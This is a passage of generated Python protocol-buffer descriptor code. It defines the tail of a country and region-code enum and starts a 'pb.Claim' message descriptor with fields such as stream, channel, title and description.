_descriptor.EnumValueDescriptor(
name='SA', index=195, number=195,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SN', index=196, number=196,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='RS', index=197, number=197,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SC', index=198, number=198,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SL', index=199, number=199,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SG', index=200, number=200,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SX', index=201, number=201,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SK', index=202, number=202,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SI', index=203, number=203,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SB', index=204, number=204,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SO', index=205, number=205,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ZA', index=206, number=206,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GS', index=207, number=207,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SS', index=208, number=208,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ES', index=209, number=209,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LK', index=210, number=210,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SD', index=211, number=211,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SR', index=212, number=212,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SJ', index=213, number=213,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SZ', index=214, number=214,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SE', index=215, number=215,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CH', index=216, number=216,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SY', index=217, number=217,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TW', index=218, number=218,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TJ', index=219, number=219,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TZ', index=220, number=220,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TH', index=221, number=221,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TL', index=222, number=222,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TG', index=223, number=223,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TK', index=224, number=224,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TO', index=225, number=225,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TT', index=226, number=226,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TN', index=227, number=227,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TR', index=228, number=228,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TM', index=229, number=229,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TC', index=230, number=230,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TV', index=231, number=231,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='UG', index=232, number=232,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='UA', index=233, number=233,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AE', index=234, number=234,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GB', index=235, number=235,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='US', index=236, number=236,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='UM', index=237, number=237,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='UY', index=238, number=238,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='UZ', index=239, number=239,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='VU', index=240, number=240,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='VE', index=241, number=241,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='VN', index=242, number=242,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='VG', index=243, number=243,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='VI', index=244, number=244,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='WF', index=245, number=245,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='EH', index=246, number=246,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='YE', index=247, number=247,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ZM', index=248, number=248,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ZW', index=249, number=249,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R001', index=250, number=250,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R002', index=251, number=251,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R015', index=252, number=252,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R012', index=253, number=253,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R818', index=254, number=254,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R434', index=255, number=255,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R504', index=256, number=256,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R729', index=257, number=257,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R788', index=258, number=258,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R732', index=259, number=259,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R202', index=260, number=260,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R014', index=261, number=261,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R086', index=262, number=262,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R108', index=263, number=263,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R174', index=264, number=264,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R262', index=265, number=265,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R232', index=266, number=266,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R231', index=267, number=267,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R260', index=268, number=268,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R404', index=269, number=269,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R450', index=270, number=270,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R454', index=271, number=271,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R480', index=272, number=272,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R175', index=273, number=273,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R508', index=274, number=274,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R638', index=275, number=275,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R646', index=276, number=276,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R690', index=277, number=277,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R706', index=278, number=278,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R728', index=279, number=279,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R800', index=280, number=280,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R834', index=281, number=281,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R894', index=282, number=282,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R716', index=283, number=283,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R017', index=284, number=284,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R024', index=285, number=285,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R120', index=286, number=286,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R140', index=287, number=287,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R148', index=288, number=288,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R178', index=289, number=289,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R180', index=290, number=290,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R226', index=291, number=291,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R266', index=292, number=292,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R678', index=293, number=293,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R018', index=294, number=294,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R072', index=295, number=295,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R748', index=296, number=296,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R426', index=297, number=297,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R516', index=298, number=298,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R710', index=299, number=299,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R011', index=300, number=300,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R204', index=301, number=301,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R854', index=302, number=302,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R132', index=303, number=303,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R384', index=304, number=304,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R270', index=305, number=305,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R288', index=306, number=306,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R324', index=307, number=307,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R624', index=308, number=308,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R430', index=309, number=309,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R466', index=310, number=310,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R478', index=311, number=311,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R562', index=312, number=312,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R566', index=313, number=313,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R654', index=314, number=314,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R686', index=315, number=315,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R694', index=316, number=316,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R768', index=317, number=317,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R019', index=318, number=318,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R419', index=319, number=319,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R029', index=320, number=320,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R660', index=321, number=321,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R028', index=322, number=322,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R533', index=323, number=323,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R044', index=324, number=324,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R052', index=325, number=325,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R535', index=326, number=326,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R092', index=327, number=327,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R136', index=328, number=328,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R192', index=329, number=329,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R531', index=330, number=330,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R212', index=331, number=331,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R214', index=332, number=332,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R308', index=333, number=333,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R312', index=334, number=334,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R332', index=335, number=335,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R388', index=336, number=336,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R474', index=337, number=337,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R500', index=338, number=338,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R630', index=339, number=339,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R652', index=340, number=340,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R659', index=341, number=341,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R662', index=342, number=342,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R663', index=343, number=343,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R670', index=344, number=344,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R534', index=345, number=345,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R780', index=346, number=346,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R796', index=347, number=347,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R850', index=348, number=348,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R013', index=349, number=349,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R084', index=350, number=350,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R188', index=351, number=351,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R222', index=352, number=352,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R320', index=353, number=353,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R340', index=354, number=354,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R484', index=355, number=355,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R558', index=356, number=356,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R591', index=357, number=357,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R005', index=358, number=358,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R032', index=359, number=359,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R068', index=360, number=360,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R074', index=361, number=361,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R076', index=362, number=362,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R152', index=363, number=363,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R170', index=364, number=364,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R218', index=365, number=365,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R238', index=366, number=366,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R254', index=367, number=367,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R328', index=368, number=368,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R600', index=369, number=369,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R604', index=370, number=370,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R239', index=371, number=371,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R740', index=372, number=372,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R858', index=373, number=373,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R862', index=374, number=374,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R021', index=375, number=375,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R060', index=376, number=376,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R124', index=377, number=377,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R304', index=378, number=378,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R666', index=379, number=379,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R840', index=380, number=380,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R010', index=381, number=381,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R142', index=382, number=382,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R143', index=383, number=383,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R398', index=384, number=384,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R417', index=385, number=385,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R762', index=386, number=386,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R795', index=387, number=387,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R860', index=388, number=388,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R030', index=389, number=389,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R156', index=390, number=390,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R344', index=391, number=391,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R446', index=392, number=392,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R408', index=393, number=393,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R392', index=394, number=394,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R496', index=395, number=395,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R410', index=396, number=396,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R035', index=397, number=397,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R096', index=398, number=398,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R116', index=399, number=399,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R360', index=400, number=400,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R418', index=401, number=401,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R458', index=402, number=402,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R104', index=403, number=403,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R608', index=404, number=404,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R702', index=405, number=405,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R764', index=406, number=406,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R626', index=407, number=407,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R704', index=408, number=408,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R034', index=409, number=409,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R004', index=410, number=410,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R050', index=411, number=411,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R064', index=412, number=412,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R356', index=413, number=413,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R364', index=414, number=414,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R462', index=415, number=415,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R524', index=416, number=416,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R586', index=417, number=417,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R144', index=418, number=418,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R145', index=419, number=419,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R051', index=420, number=420,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R031', index=421, number=421,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R048', index=422, number=422,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R196', index=423, number=423,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R268', index=424, number=424,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R368', index=425, number=425,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R376', index=426, number=426,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R400', index=427, number=427,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R414', index=428, number=428,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R422', index=429, number=429,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R512', index=430, number=430,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R634', index=431, number=431,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R682', index=432, number=432,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R275', index=433, number=433,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R760', index=434, number=434,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R792', index=435, number=435,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R784', index=436, number=436,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R887', index=437, number=437,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R150', index=438, number=438,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R151', index=439, number=439,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R112', index=440, number=440,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R100', index=441, number=441,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R203', index=442, number=442,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R348', index=443, number=443,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R616', index=444, number=444,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R498', index=445, number=445,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R642', index=446, number=446,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R643', index=447, number=447,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R703', index=448, number=448,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R804', index=449, number=449,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R154', index=450, number=450,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R248', index=451, number=451,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R830', index=452, number=452,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R831', index=453, number=453,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R832', index=454, number=454,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R680', index=455, number=455,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R208', index=456, number=456,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R233', index=457, number=457,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R234', index=458, number=458,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R246', index=459, number=459,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R352', index=460, number=460,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R372', index=461, number=461,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R833', index=462, number=462,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R428', index=463, number=463,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R440', index=464, number=464,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R578', index=465, number=465,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R744', index=466, number=466,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R752', index=467, number=467,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R826', index=468, number=468,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R039', index=469, number=469,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R008', index=470, number=470,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R020', index=471, number=471,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R070', index=472, number=472,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R191', index=473, number=473,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R292', index=474, number=474,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R300', index=475, number=475,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R336', index=476, number=476,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R380', index=477, number=477,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R470', index=478, number=478,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R499', index=479, number=479,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R807', index=480, number=480,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R620', index=481, number=481,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R674', index=482, number=482,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R688', index=483, number=483,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R705', index=484, number=484,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R724', index=485, number=485,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R155', index=486, number=486,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R040', index=487, number=487,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R056', index=488, number=488,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R250', index=489, number=489,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R276', index=490, number=490,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R438', index=491, number=491,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R442', index=492, number=492,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R492', index=493, number=493,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R528', index=494, number=494,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R756', index=495, number=495,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R009', index=496, number=496,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R053', index=497, number=497,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R036', index=498, number=498,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R162', index=499, number=499,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R166', index=500, number=500,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R334', index=501, number=501,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R554', index=502, number=502,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R574', index=503, number=503,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R054', index=504, number=504,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R242', index=505, number=505,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R540', index=506, number=506,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R598', index=507, number=507,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R090', index=508, number=508,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R548', index=509, number=509,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R057', index=510, number=510,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R316', index=511, number=511,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R296', index=512, number=512,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R584', index=513, number=513,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R583', index=514, number=514,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R520', index=515, number=515,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R580', index=516, number=516,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R585', index=517, number=517,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R581', index=518, number=518,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R061', index=519, number=519,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R016', index=520, number=520,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R184', index=521, number=521,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R258', index=522, number=522,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R570', index=523, number=523,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R612', index=524, number=524,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R882', index=525, number=525,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R772', index=526, number=526,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R776', index=527, number=527,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R798', index=528, number=528,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R876', index=529, number=529,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=5337,
serialized_end=10561,
)
_sym_db.RegisterEnumDescriptor(_LOCATION_COUNTRY)
_CLAIM = _descriptor.Descriptor(
name='Claim',
full_name='pb.Claim',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='stream', full_name='pb.Claim.stream', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='channel', full_name='pb.Claim.channel', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='collection', full_name='pb.Claim.collection', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='repost', full_name='pb.Claim.repost', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='title', full_name='pb.Claim.title', index=4,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='description', full_name='pb.Claim.description', index=5,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='thumbnail', full_name='pb.Claim.thumbnail', index=6,
